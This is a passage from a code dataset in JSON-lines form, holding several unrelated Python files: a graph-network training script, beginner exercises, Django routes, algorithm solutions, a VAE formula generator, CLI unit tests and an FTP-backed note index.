tf.logging.info(f\"[LOAD]{ckpt}\")\n try:\n saver.restore(sess, ckpt)\n except:\n print(\"======LOAD ERROR======\")\n print_variables()\n print_ckpt(sess, ckpt)\n raise Exception\n return saver\n\n\ndef get_pos_weight(data):\n adjs = data.adjs\n ws = []\n for adj in adjs:\n for ch, a in enumerate(adj):\n num = a[2][0]\n num_all = num*num\n num_pos = len(a[0])\n num_neg = num_all-num_pos\n ws.append(num_neg/num_pos)\n return np.mean(ws)\n\n\ndef get_norm(data):\n adjs = data.adjs\n ws = []\n for adj in adjs:\n for ch, a in enumerate(adj):\n num = a[2][0]\n num_all = num*num\n num_pos = len(a[0])\n num_neg = num_all-num_pos\n ws.append(num_all/num_neg*2)\n return 
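The script above finishes with `filters.apply_hysteresis_threshold(edges, low, high)`; a tiny illustration of the rule it applies — pixels above `high` seed edges, and connected pixels above `low` survive with them:

```python
# Hysteresis on a 1-row image: only index 2 exceeds high, but its
# neighbours above low (indices 1 and 3) are kept because they connect.
import numpy as np
from skimage import filters

edges = np.array([[0.0, 0.5, 2.0, 0.5, 0.0]])
print(filters.apply_hysteresis_threshold(edges, low=0.3, high=1.7).astype(int))
# [[0 1 1 1 0]]
```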
np.mean(ws)\n\n\ndef train(sess, config):\n if config[\"validation_dataset\"] is None:\n all_data, train_data, valid_data, info = load_and_split_data(config, filename=config[\"dataset\"],\n valid_data_rate=config[\"validation_data_rate\"])\n else:\n print(\"[INFO] training\")\n train_data, info = load_data(config, filename=config[\"dataset\"])\n print(\"[INFO] validation\")\n valid_data, valid_info = load_data(config, filename=config[\"validation_dataset\"])\n info[\"graph_node_num\"] = max(info[\"graph_node_num\"], valid_info[\"graph_node_num\"])\n info[\"graph_num\"] = info[\"graph_num\"] + valid_info[\"graph_num\"]\n # train model\n graph_index_list = []\n for i in range(info[\"graph_num\"]):\n graph_index_list.append([i, i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(train_data)\n info.norm = get_norm(train_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"])\n\n vars_to_train = tf.trainable_variables()\n for v in vars_to_train:\n print(v)\n\n # Training\n start_t = time.time()\n model.fit(train_data, valid_data)\n train_time = time.time() - start_t\n print(f\"training time:{train_time}[sec]\")\n # Validation\n start_t = time.time()\n validation_cost, validation_accuracy, validation_prediction_data = model.pred_and_eval(valid_data)\n training_cost, training_accuracy, training_prediction_data = model.pred_and_eval(train_data)\n infer_time = time.time() - start_t\n print(f\"final cost(training ) = {training_cost}\\n\"\n f\"accuracy (training ) = {training_accuracy['accuracy']}\\n\"\n f\"final cost(validation) = {validation_cost}\\n\"\n f\"accuracy (validation) = {validation_accuracy['accuracy']}\\n\"\n f\"infer time:{infer_time}[sec]\\n\")\n # Saving\n if config[\"save_info_valid\"] is not None:\n result = {}\n result[\"validation_cost\"] = validation_cost\n result[\"validation_accuracy\"] = validation_accuracy[\"accuracy\"]\n result[\"train_time\"] = train_time\n result[\"infer_time\"] = infer_time\n save_path = config[\"save_info_valid\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4)\n\n if config[\"save_info_train\"] is not None:\n result = {}\n result[\"test_cost\"] = training_cost\n result[\"test_accuracy\"] = training_accuracy[\"accuracy\"]\n result[\"train_time\"] = train_time\n save_path = config[\"save_info_train\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n\n if \"reconstruction_valid\" in config:\n filename = config[\"reconstruction_valid\"]\n print(os.path.dirname(filename))\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(validation_prediction_data, filename)\n if \"reconstruction_train\" in config:\n filename = config[\"reconstruction_train\"]\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(training_prediction_data, filename)\n\n\ndef reconstruct(sess, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename)\n\n graph_index_list = []\n for i in range(all_data.num):\n graph_index_list.append([i, 
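get_pos_weight/get_norm above derive re-weighting terms from each adjacency channel's sparsity; a worked example with assumed counts (4 nodes, 3 stored positives), noting that `num_all/num_neg*2` evaluates left to right:

```python
# One channel of an assumed 4-node adjacency with 3 positive entries.
num = 4
num_all = num * num           # 16 candidate edges
num_pos = 3
num_neg = num_all - num_pos   # 13
print(num_neg / num_pos)      # ~4.33 -> pos_weight, up-weights rare positives
print(num_all / num_neg * 2)  # ~2.46 -> norm, computed as (num_all/num_neg)*2
```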
i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(all_data)\n info.norm = get_norm(all_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"], is_train=False)\n\n vars_to_train = tf.trainable_variables()\n for v in vars_to_train:\n print(v)\n\n # initialize session\n restore_ckpt(sess, config[\"load_model\"])\n\n start_t = time.time()\n cost, acc, pred_data = model.pred_and_eval(all_data)\n recons_data = pred_data\n \"\"\"\n recons_data=[]\n for i in range(3):\n print(i)\n cost,acc,pred_data=model.pred_and_eval(all_data)\n recons_data.append(pred_data)\n \"\"\"\n if \"reconstruction_test\" in config:\n filename = config[\"reconstruction_test\"]\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(recons_data, filename)\n\n\ndef generate(sess, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename)\n\n graph_index_list = []\n for i in range(all_data.num):\n graph_index_list.append([i, i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(all_data)\n info.norm = get_norm(all_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"], is_train=False)\n # initialize session\n saver = tf.train.Saver()\n #sess.run(tf.global_variables_initializer())\n restore_ckpt(sess, config[\"load_model\"])\n\n start_t = time.time()\n cost, acc, pred_data = model.pred_and_eval(all_data)\n generated_data = pred_data\n\n if \"generation_test\" in config:\n filename = config[\"generation_test\"]\n dirname = os.path.dirname(filename)\n if dirname != \"\":\n os.makedirs(dirname, exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(generated_data, filename)\n\n\ndef main():\n seed = 1234\n np.random.seed(seed)\n tf.set_random_seed(seed)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('mode', type=str,\n help='train/infer')\n parser.add_argument('--config', type=str,\n default=None,\n nargs='?',\n help='config json file')\n parser.add_argument('--save-config',\n default=None,\n nargs='?',\n help='save config json file')\n parser.add_argument('--no-config',\n action='store_true',\n help='use default setting')\n parser.add_argument('--model', type=str,\n default=None,\n help='model')\n parser.add_argument('--dataset', type=str,\n default=None,\n help='dataset')\n parser.add_argument('--gpu', type=str,\n default=None,\n help='constraint gpus (default: all) (e.g. 
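main() above wires a positional `mode` plus optional overrides through argparse; a minimal reproduction of that CLI pattern, parsing an explicit argv list so it runs without a terminal:

```python
# Same argparse shape as gcn_gen.py's main(): positional mode + --gpu string.
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("mode", type=str, help="train/reconstruct/generate")
parser.add_argument("--gpu", type=str, default=None, help="e.g. --gpu 0,2")
args = parser.parse_args(["reconstruct", "--gpu", "0,2"])
print(args.mode, args.gpu)  # reconstruct 0,2
```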
--gpu 0,2)')\n parser.add_argument('--cpu',\n action='store_true',\n help='cpu mode (calcuration only with cpu)')\n\n args = parser.parse_args()\n # config\n config = get_default_config()\n if args.config is None:\n pass\n #parser.print_help()\n #quit()\n else:\n print(\"[LOAD] \", args.config)\n fp = open(args.config, 'r')\n config.update(json.load(fp))\n # option\n if args.model is not None:\n config[\"load_model\"] = args.model\n if args.dataset is not None:\n config[\"dataset\"] = args.dataset\n # gpu/cpu\n if args.cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n elif args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n # setup\n with tf.Graph().as_default():\n #with tf.Graph().as_default(), tf.device('/cpu:0'):\n with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:\n # mode\n if args.mode == \"train\":\n train(sess, config)\n elif args.mode == \"reconstruct\":\n reconstruct(sess, config)\n elif args.mode == \"generate\":\n generate(sess, config)\n if args.save_config is not None:\n print(f\"[SAVE] {args.save_config}\")\n fp = open(args.save_config, \"w\")\n json.dump(config, fp, indent=4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"gcn_gen.py","file_name":"gcn_gen.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"34513853315","text":"# Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário\n# escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal.\n\nnum = int(input('Escreva um número: '))\nchoice = int(input('Digite'\n '\\n1 para binário '\n '\\n2 para octal '\n '\\n3 para hexadecimal'\n '\\n'))\n\nif choice == 1:\n print('O número {} em binário fica {}.'.format(num, bin(num)))\nelif choice == 2:\n print('O número {} em octal fica {}'.format(num, oct(num)))\nelif choice == 3:\n print('O número {} em hexadecimal fica {}.'.format(num, hex(num)))\nelse:\n print('Você não escolheu nenhuma das opções. 
\\nAssim não da!')\n","repo_name":"amandacordeiro/Exercicios-Python","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26485107158","text":"from django.conf.urls import url\n\nfrom questionnaire import views\n\n\nurlpatterns = [\n url(r'^$', views.dashboard, name='dashboard'),\n url(r'^clients/followup/day7/$', views.followup_day7, name='followup-day7'),\n url(r'^clients/followup/day28/$', views.followup_day28, name='followup-day28'),\n url(r'^clients/followup/missed_visit2/$', views.missed_visit2, name='missed_visit2'),\n url(r'^clients/followup/reminders/$', views.followup_day3, name='reminders'),\n url(r'^forms/$', views.form_listing, name='form-listing'),\n url(r'^new/$', views.manage_form, name='form-create'),\n url(r'^(?P[-\\w]+)/$', views.manage_form, name='form-update'),\n url(r'^(?P[-\\w]+)/editor/$', views.form_editor, name='form-editor'),\n url(r'^(?P[-\\w]+)/data/$', views.data_listing, name='data-listing'),\n url(r'^(?P[-\\w]+)/export/$', views.export_form_data, name='data-export'),\n url(r'^(?P[-\\w]+)/new$', views.form_display, name='data-create'),\n url(r'^(?P[-\\w]+)/(?P[-\\w]+)/$', views.form_display, name='data-update'),\n]\n","repo_name":"mhegelele/ccbr_maternal","sub_path":"questionnaire/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21906517335","text":"#!/usr/bin/env python3\nimport time\n\nINFINITY = 0x7f7f7f7f\nedges = {}\n\ndef key(i, j):\n return str(i) + \", \" + str(j)\n\ndef dijkstra(nv, src, dest):\n '''dijkstra'''\n dist = {}\n visited = {}\n for i in range(nv):\n dist[i] = edges[key(src, i)]\n visited[i] = 0\n\n visited[src] = 1\n for i in range(1, nv):\n min_value = INFINITY\n for j in range(nv):\n if(visited[j] == 0 and (dist[j] < min_value)):\n min_value = dist[j]\n min_index = j\n\n visited[min_index] = 1\n for k in range(nv):\n if(visited[k] == 0 and dist[k] > (dist[min_index] + edges[key(min_index, k)])):\n dist[k] = dist[min_index] + edges[key(min_index, k)]\n\n return dist[dest]\n\nwith open('edges.txt', 'r') as f:\n first_line = f.readline()\n n = int(first_line.split()[0])\n for i in range(n):\n for j in range(n):\n edges[key(i, j)] = INFINITY\n for line in f:\n tokens = line.split()\n i = int(tokens[0])\n j = int(tokens[1])\n dist = int(tokens[2])\n edges[key(i, j)] = dist\n\nstart = time.time()\nfor i in range(10):\n dijkstra(n, 0, n-1)\nprint(\"python running time: \" + str(time.time() - start))\n\n","repo_name":"yuanboli/practice","sub_path":"template/dijkstra_backup.py","file_name":"dijkstra_backup.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74693110313","text":"import sys\n\ninput = sys.stdin.readline\n\ndef binary_search(arr, start, end, target):\n while start <= end:\n mid = (start + end) // 2\n if arr[mid] == target:\n return True\n elif arr[mid] < target:\n start = mid+1\n else:\n end = mid-1\n return False\n\n\nn = int(input())\nn_list = sorted(map(int, input().split()))\nm = int(input())\nm_list = map(int, input().split())\n\nfor m_item in m_list:\n result = binary_search(n_list, 0, n-1, m_item)\n if result:\n print(1)\n else:\n 
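dijkstra_backup.py in this block runs the O(V^2) scan over string-keyed edge weights; a sketch of the same single-pair query with a binary heap and an adjacency dict (the input shape here is assumed, not the file format the script reads):

```python
# Heap-based variant of the shortest path computed by dijkstra_backup.py;
# stale heap entries are skipped instead of maintaining a visited array.
import heapq

def dijkstra_heap(adj, src, dest):
    dist = {src: 0}
    heap = [(0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if u == dest:
            return d
        if d > dist.get(u, float("inf")):
            continue  # outdated entry, already relaxed via a shorter path
        for v, w in adj.get(u, []):
            if d + w < dist.get(v, float("inf")):
                dist[v] = d + w
                heapq.heappush(heap, (d + w, v))
    return float("inf")

print(dijkstra_heap({0: [(1, 2), (2, 5)], 1: [(2, 1)]}, 0, 2))  # 3
```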
print(0)\n","repo_name":"CoodingPenguin/problem-solving","sub_path":"boj/1920_수찾기.py","file_name":"1920_수찾기.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10377080499","text":"#! /usr/bin/env python3\n\nimport lib\n\nclass ErrorHandler(object):\n def __enter__(self):\n pass\n\n def __exit__(self, error_type, error_args, traceback):\n if error_type is None:\n return\n if error_type is lib.gui.tk.TclError:\n print(\"WARNING: A GUI-related `TclError` error occurred:\"\n , error_args)\n return True\n if issubclass(error_type, Exception):\n lib.gui.Message(message=repr(error_args)\n , icon='warning'\n , title='Gomoku - Error').show()\n return False\n\nif __name__ == '__main__':\n main_window = lib.gui.MainWindow(15, 15)\n with ErrorHandler():\n main_window.mainloop()\n","repo_name":"storandrew/Renju","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10421112929","text":"\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.utils.data\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nimport argparse\r\n\r\n\r\n\r\n\r\nclass VAE(nn.Module):\r\n def __init__(self):\r\n super(VAE, self).__init__()\r\n self.encoder_conv = nn.Sequential(\r\n nn.Conv1d(1,16,kernel_size=3,stride=2,padding=1),\r\n nn.LeakyReLU(0.2,inplace=True), #(89+2*1-3)/2+1=43\r\n\r\n nn.Conv1d(16,32,kernel_size=3,stride=2,padding=1), \r\n nn.LeakyReLU(0.2,inplace=True), #(43+2*1-3)/2+1=22\r\n\r\n nn.Conv1d(32,32,kernel_size=3,stride=2,padding=1),\r\n nn.LeakyReLU(0.2,inplace=True), #(22+2*1-3)/2+1=12\r\n )\r\n self.encoder_fc1=nn.Linear(32*12,nz)\r\n self.encoder_fc2=nn.Linear(32*12,nz)\r\n self.decoder_fc = nn.Linear(nz+3,32 * 12)\r\n self.decoder_deconv = nn.Sequential( \r\n nn.ConvTranspose1d(32, 16, 2, 2, 1),#2*(12-1)+2-2*1=22\r\n nn.ReLU(inplace=True), \r\n nn.ConvTranspose1d(16, 16, 3, 2, 1),#2*(22-1)+3-2*1=43\r\n nn.ReLU(inplace=True),\r\n nn.ConvTranspose1d(16, 1, 2, 2, 0),#2*(43-1)+2-2*0=86\r\n nn.ReLU(inplace=True),\r\n )\r\n\r\n\r\n def noise_reparameterize(self,mean,logvar):\r\n eps = torch.randn(mean.shape).to(device)\r\n z = mean + eps * torch.exp(logvar)\r\n return z\r\n\r\n def forward(self, x,label):\r\n z ,mean.logstd= self.encoder(x,label)\r\n output = self.decoder(z,label)\r\n return output\r\n def encoder(self,x,label):#[b,1,86] [b,1,3] =[b,1,89] \r\n label=torch.unsqueeze(label,1)\r\n x=torch.cat([x,label], axis=2)\r\n out1, out2 = self.encoder_conv(x), self.encoder_conv(x)\r\n # print(out1.size())\r\n mean = self.encoder_fc1(out1.view(out1.shape[0], -1))\r\n logstd = self.encoder_fc2(out2.view(out2.shape[0], -1))\r\n z = self.noise_reparameterize(mean, logstd)\r\n return z,mean,logstd\r\n def decoder(self,z,label):\r\n z=torch.cat([z,label], axis=1)\r\n out3 = self.decoder_fc(z)\r\n out3= nn.ReLU()(out3)\r\n out3 = out3.view(out3.shape[0], 32, -1)\r\n out3 = self.decoder_deconv(out3)\r\n return out3\r\n\r\n\r\n\r\nlb = LabelBinarizer()\r\n\r\ndef to_categrical(y):\r\n lb.fit(list(range(1,4)))\r\n y_one_hot =lb.transform(y)\r\n y_one_hot=torch.tensor(y_one_hot).type(torch.FloatTensor)\r\n return y_one_hot\r\n\r\n\r\nspecies1=['H', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'K', 'Ca', 'Sc', 'Ti', 'V', \r\n 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 
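game.py above suppresses `TclError` by returning True from `__exit__`; a stripped-down demo of that suppression contract with a stand-in exception type:

```python
# Returning True from __exit__ swallows the active exception; anything
# falsy lets it propagate -- the same rule ErrorHandler relies on.
class Suppress:
    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        return exc_type is ZeroDivisionError

with Suppress():
    1 / 0
print("still running")  # reached: the ZeroDivisionError was suppressed
```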
'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', \r\n 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', \r\n 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', \r\n 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu']\r\n\r\n\r\ndef get_fumal(array,label):\r\n gen_im=array.detach().cpu()\r\n gen_im=gen_im.view(-1,86)\r\n array=np.array(gen_im[0])\r\n\r\n f=str()\r\n for i,j in enumerate(array):\r\n if float(str(j))>0:\r\n f=f+str(species1[i])+str(j)[:4]\r\n print(str(label),':',f)\r\n return f\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n # device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\n # device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\n\r\n\r\n print(\"=====> Setup model\")\r\n nz=20\r\n vae = VAE().to(device)\r\n vae=torch.load(r'ckp/VAE.pth')\r\n print('loading pretrained model')\r\n parser = argparse.ArgumentParser()\r\n Tc_dict={'high':2,'medium':1,'low':0}\r\n parser.add_argument('--num', type=int, default = 3500)\r\n parser.add_argument('--Tc', type=str, default='medium',choices=['high','medium','low'])\r\n args = parser.parse_args()\r\n print('Input Tc Condition',args.Tc)\r\n print('Input Num',args.num)\r\n\r\n with torch.no_grad():\r\n all_f=[]\r\n for i in range( args.num):\r\n label_onehot = torch.zeros((1, 3))\r\n label_onehot[:,Tc_dict[args.Tc]]=1\r\n z = torch.randn((1, 20)).to(device)\r\n output = vae.decoder(z,label_onehot.to(device))\r\n new_f=get_fumal(output,'new')\r\n all_f.append(new_f)\r\n all=pd.DataFrame(all_f)\r\n all.to_csv('low_fumal.csv')\r\n\r\n\r\n\r\n\r\n","repo_name":"852569069/SuperConductor-CVAEGAN","sub_path":"sample_generation.py","file_name":"sample_generation.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906996319","text":"from conductr_cli.test.cli_test_case import CliTestCase, strip_margin, as_error\nfrom conductr_cli import sandbox_stop_docker, logging_setup\nfrom unittest.mock import patch, MagicMock\nfrom subprocess import CalledProcessError\n\n\nclass TestStop(CliTestCase):\n\n default_args = {\n 'local_connection': True,\n 'verbose': False,\n 'quiet': False,\n 'image_dir': '/Users/mj/.conductr/images'\n }\n\n def test_stop_containers(self):\n stdout = MagicMock()\n containers = ['cond-0', 'cond-1']\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm') as mock_docker_rm:\n logging_setup.configure_logging(MagicMock(**self.default_args), stdout)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual(strip_margin(\"\"\"||------------------------------------------------|\n || Stopping ConductR |\n ||------------------------------------------------|\n |ConductR has been successfully stopped\n |\"\"\"), self.output(stdout))\n mock_docker_rm.assert_called_once_with(containers)\n\n def test_cannot_stop_containers(self):\n stdout = MagicMock()\n stderr = MagicMock()\n mock_docker_rm = MagicMock(side_effect=CalledProcessError(-1, 'test only'))\n containers = ['cond-0', 'cond-1']\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm', mock_docker_rm):\n 
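Note that `VAE.forward` in this record unpacks with `z ,mean.logstd= self.encoder(x,label)` — an attribute access on an undefined `mean` that would raise at runtime; the bug stays latent because the `__main__` block only exercises `vae.decoder`. A corrected sketch of the intended three-value unpacking (a method-body fragment, not a standalone script):

```python
# Corrected unpacking for VAE.forward -- encoder() returns (z, mean, logstd).
def forward(self, x, label):
    z, mean, logstd = self.encoder(x, label)
    return self.decoder(z, label)
```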
logging_setup.configure_logging(MagicMock(**self.default_args), stdout, stderr)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual(strip_margin(\"\"\"||------------------------------------------------|\n || Stopping ConductR |\n ||------------------------------------------------|\n |\"\"\"), self.output(stdout))\n self.assertEqual(\n as_error(strip_margin(\"\"\"|Error: ConductR containers could not be stopped\n |Error: Please stop the Docker containers manually\n |\"\"\")), self.output(stderr))\n mock_docker_rm.assert_called_once_with(containers)\n\n def test_stop_no_containers(self):\n stdout = MagicMock()\n containers = []\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm') as mock_docker_rm:\n logging_setup.configure_logging(MagicMock(**self.default_args), stdout)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual('', self.output(stdout))\n mock_docker_rm.assert_not_called()\n","repo_name":"typesafehub/conductr-cli","sub_path":"conductr_cli/test/test_sandbox_stop_docker.py","file_name":"test_sandbox_stop_docker.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"15133742759","text":"x1,y1,x2,y2 = map(int,input().split())\r\n\r\nW,H = abs(x1-x2),abs(y1-y2)\r\n\r\n\r\n\r\nflip_x = x1 > x2\r\nflip_y = y1 > y2\r\n\r\nxo = min(x1,x2)\r\nyo = min(y1,y2)\r\n\r\nN = int(input())\r\n\r\nF = []\r\n\r\nfor i in range(N):\r\n x,y = map(int,input().split())\r\n x -= xo\r\n y -= yo\r\n if 0 <= x <= W and 0 <= y <= H:\r\n if flip_x:\r\n x = W-x\r\n if flip_y:\r\n y = H-y\r\n F.append((x,y))\r\n\r\nN = len(F)\r\n\r\nfrom math import pi\r\nfrom bisect import bisect\r\n\r\n\r\n#?????\r\nL = (W+H)*100\r\n\r\nif (W == 0 or H == 0) and F:\r\n L += pi*10-20\r\nelif N > 0:\r\n # find LIS\r\n F.sort()\r\n F = [y for x,y in F]\r\n\r\n dp = [H+1]*len(F)\r\n\r\n for i,f in enumerate(F):\r\n dp[bisect(dp,f)] = f\r\n\r\n n = bisect(dp,H)\r\n\r\n L -= (20-pi*5)*n\r\n if n == min(W,H) + 1:\r\n L += pi*5\r\n\r\nprint(L)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc019/C/1544282.py","file_name":"1544282.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"3808374788","text":"from lib.util import *\n\n\ndef master_append(id, ftp, path, titolo, autore, dataCalendario, tags):\n \"\"\"\n :param id: The id of the new note\n :type id: int\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n :param titolo: The title of the note\n :type titolo: string\n :param autore: The author of the note\n :type autore: string\n :param dataCalendario: The date wich the note was written, should be gathered with time.time()\n :type dataCalendario: float\n :param tags: An arrays of strings containing the tags of the note\n :type tags: string array\n \"\"\"\n master_update(ftp)\n out = str(id) + \";\" + titolo + \";\" + autore + \";\" + str(dataCalendario) + \";0;;;\"\n x = -1\n for i in tags:\n x += 1\n out += i\n if (tags[x] != tags[-1]):\n out += \",\"\n out += \"\\n\"\n open(path, \"a\").write(out)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_delete(ftp, path, id):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is 
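test_cannot_stop_containers above injects a failure with `MagicMock(side_effect=CalledProcessError(...))`; a self-contained demo of that side_effect behaviour — calling the mock raises the configured exception:

```python
# side_effect set to an exception instance makes every call raise it,
# mimicking a failing `docker rm` without touching Docker at all.
from subprocess import CalledProcessError
from unittest.mock import MagicMock

mock_docker_rm = MagicMock(side_effect=CalledProcessError(-1, "test only"))
try:
    mock_docker_rm(["cond-0"])
except CalledProcessError as err:
    print(err.returncode, err.cmd)  # -1 test only
```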
located:\n :type path: string\n :param id: The id of the note to be deleted\n :type id: int\n \"\"\"\n master_update(ftp)\n line = 0\n x = -1\n with open(path) as f:\n for line_terminated in f:\n x += 1\n data = line_terminated.split(\";\")\n if (data[0] == id):\n line = x\n break\n with open(path, \"r\") as f:\n lines = f.readlines()\n lines[x] = \"\"\n with open(path, \"w\") as f:\n f.writelines(lines)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_edit(ftp, path, id, index, new):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n :param id: The id of the note to be edited\n :type id: string\n :param index: The index of the block to edit, zero based\n :type index: int\n :param new: The new string to be inserted in the specified index\n :type new: string\n \"\"\"\n master_update(ftp)\n x = -1\n with open(path) as f:\n for line_terminated in f:\n x += 1\n data = line_terminated.split(\";\")\n if (data[0] == id):\n break\n db_edit(path, x, index, new)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_ls(ftp, path):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n \"\"\"\n master_update(ftp)\n v = []\n with open(path) as f:\n for line_terminated in f:\n v.append(line_terminated.rstrip())\n return v\n\n\ndef master_update(ftp):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n \"\"\"\n if \"master.txt\" in ftp.nlst():\n ftp.retrbinary(\"RETR master.txt\", open(\"master.txt\", \"wb\").write) # TODO Hide file\n\n\nif __name__ == \"__main__\":\n print(\"Debugging master.py\\n\")\n","repo_name":"eliaperantoni/EzAppunti","sub_path":"lib/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36909591344","text":"from stack import Stack\n\n\n# This creates a new instance of the Stack, named s\n# All stack operations can be performed on s, such as popping and pushing\n# by specifying s.push(item) and s.pop()\ns = Stack()\n\n# A simple program I created to show how this program is used.\n# \"push [item]\" will push something onto the stack\n# \"pop\" will pop the top item off the stack\n# \"print\" will show what is inside the data of the stack at a given time\n# Try printing after you pop something off the stack to see what happens!\nwhile True:\n\tline = input()\n\tif line == \"exit\":\n\t\tbreak\n\tline = line.split(\" \")\n\tif line[0] == \"push\":\n\t\tprint(\"--> Pushing %s\" % line[1])\n\t\ts.push(line[1])\n\telif line[0] == \"pop\":\n\t\tprint(\"--> Popped %s\" % s.pop())\n\telif line[0] == \"print\":\n\t\tprint(\"--> data: %s\" % s.data)\n\t\tprint(\"--> index: %i\" % s.idx)\n\telse:\n\t\tprint(\"Command not recognized\")\n","repo_name":"klieth/HS","sub_path":"Stack/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 